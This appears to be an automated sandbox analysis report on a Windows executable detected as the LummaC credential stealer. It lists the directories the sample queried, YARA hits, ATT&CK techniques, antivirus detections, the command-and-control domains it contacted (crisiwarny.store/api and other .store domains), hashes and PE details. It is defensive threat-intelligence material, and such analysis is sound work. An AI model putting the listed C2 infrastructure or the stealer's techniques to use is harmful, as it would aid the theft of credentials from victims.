              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
              Source: Yara matchFile source: 00000001.00000003.1367227452.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1364978590.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1348830892.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1336432602.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1349179623.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1349466810.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1364471802.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1335230711.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1348810433.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Infostealer.Tinba
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u0%URL Reputationsafe
              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              crisiwarny.store
              		172.67.170.64
              		truetrue
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  presticitpo.storetrue
                    		unknown
                    scriptyprefej.storetrue
                      		unknown
                      https://crisiwarny.store/apitrue
                        		unknown
                        necklacedmny.storetrue
                          		unknown
                          fadehairucw.storetrue
                            		unknown
                            navygenerayk.storetrue
                              		unknown
                              founpiuer.storetrue
                                		unknown
                                thumbystriw.storetrue
                                  		unknown
                                  crisiwarny.storetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.microsoftfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ocsp.rootca1.amazontrust.com0:file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://crisiwarny.store/Lfile.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.ecosia.org/newtab/file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://crisiwarny.store/Yfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://crisiwarny.store/api7AGfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://crisiwarny.store/apiTfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://x1.c.lencr.org/0file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://x1.i.lencr.org/0file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://crisiwarny.store/api(wfile.exe, 00000001.00000002.1447839504.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1388801349.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000001.00000003.1349361584.000000000540D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://crisiwarny.store/apibmfile.exe, 00000001.00000003.1364471802.0000000000B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://crisiwarny.store/jfile.exe, 00000001.00000003.1348738975.0000000005313000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1349101168.0000000005313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://crisiwarny.store/file.exe, 00000001.00000002.1447480635.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312761325.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1433151385.0000000005301000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1449178158.0000000005302000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://crisiwarny.store/apiqfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000001.00000003.1319650588.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1316164190.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://crisiwarny.store/8file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://crisiwarny.store/sfile.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000001.00000003.1364448809.0000000005325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.67.170.64
                                                                      		crisiwarny.storeUnited States
                                                                      		13335CLOUDFLARENETUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1542964
                                                                      Start date and time:2024-10-27 01:21:09 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 8s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:14
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:Failed
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: file.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      19:22:09API Interceptor9x Sleep call for process: file.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      172.67.170.64file.exeGet hashmaliciousLummaCBrowse
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                      SecuriteInfo.com.Win32.RATX-gen.21236.13558.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        crisiwarny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.95.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUShttps://link.edgepilot.com/s/e9b35021/KNsrNVGwOUukNjaKm_560w?u=https://publicidadnicaragua.com/Get hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        SUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 172.67.74.152
                                                                                        JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 188.114.96.3
                                                                                        WINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.95.91
                                                                                        SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                        • 104.21.9.210
                                                                                        R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                        • 104.21.9.210
                                                                                        DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                        • 104.21.9.210
                                                                                        MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                        • 172.67.161.82

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        TZH3Uk8x45.batGet hashmaliciousDBatLoader, PureLog Stealer, XWormBrowse
                                                                                        • 172.67.170.64
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 172.67.170.64
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.170.64

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        No created / dropped files found

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.529685648898097
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:2'939'904 bytes
                                                                                        MD5:89eb026b1e8b37df60728d38b5ba98ba
                                                                                        SHA1:20bef1ee48878b4b83d805f4b7d4c0b9b493f7d2
                                                                                        SHA256:7e903a309497439f4842b480e73d0b8c71a01cc597d3127c8869f093465c2317
                                                                                        SHA512:7f196f2db71473355c28438ca8755b845dc448117961a37c122b6f8f40a68f3fc80d8d7ea19357f9377d890efd415e3b8cd4e933bcecba365d0b05be7f0602dc
                                                                                        SSDEEP:49152:zo6p4/Ke4dutmcR2g5y2qzG6KOPeQtaAoF:z0/Ke4dutmcR2g5PMKN
                                                                                        TLSH:51D56C92B9497ACFD44F3378942BCD81995D43FA472D08C3982D75BA7DA3CC21AB6C24
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.......................... 0.....!d-...@.................................T...h..

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x6ff000
                                                                                        Entrypoint Section:.taggant
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp 00007FBBF06D5A6Ah
                                                                                        bts dword ptr [eax+eax], 00000000h
                                                                                        add byte ptr [eax], al
                                                                                        add cl, ch
                                                                                        add byte ptr [eax], ah
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [0000000Ah], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], dl
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [ebx], cl
                                                                                        or al, byte ptr [eax]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [edi], al
                                                                                        add byte ptr [eax], 00000000h
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        adc byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add ecx, dword ptr [edx]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        xor byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        sub byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
